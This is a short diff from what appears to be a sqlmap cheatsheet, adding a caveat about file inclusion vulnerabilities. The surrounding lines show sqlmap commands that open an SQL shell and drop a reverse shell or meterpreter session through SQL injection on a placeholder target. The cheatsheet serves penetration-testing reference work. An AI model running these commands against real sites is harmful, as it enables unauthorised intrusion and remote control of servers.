tymyrddin/cheatsheets/source/docs/databases/sqlmap-cheatsheet.md

     # sqlmap -u "<target>/<pagename>.php?id=1" --sql-shell

-Dropping a reverse-shell/meterpreter (requires permissions):
+Dropping a reverse-shell/meterpreter (requires permissions or a file inclusion vulnerability in any of the applications on the webserver):

     # sqlmap -u "<target>/<pagename>.php?id=1" --os-pwn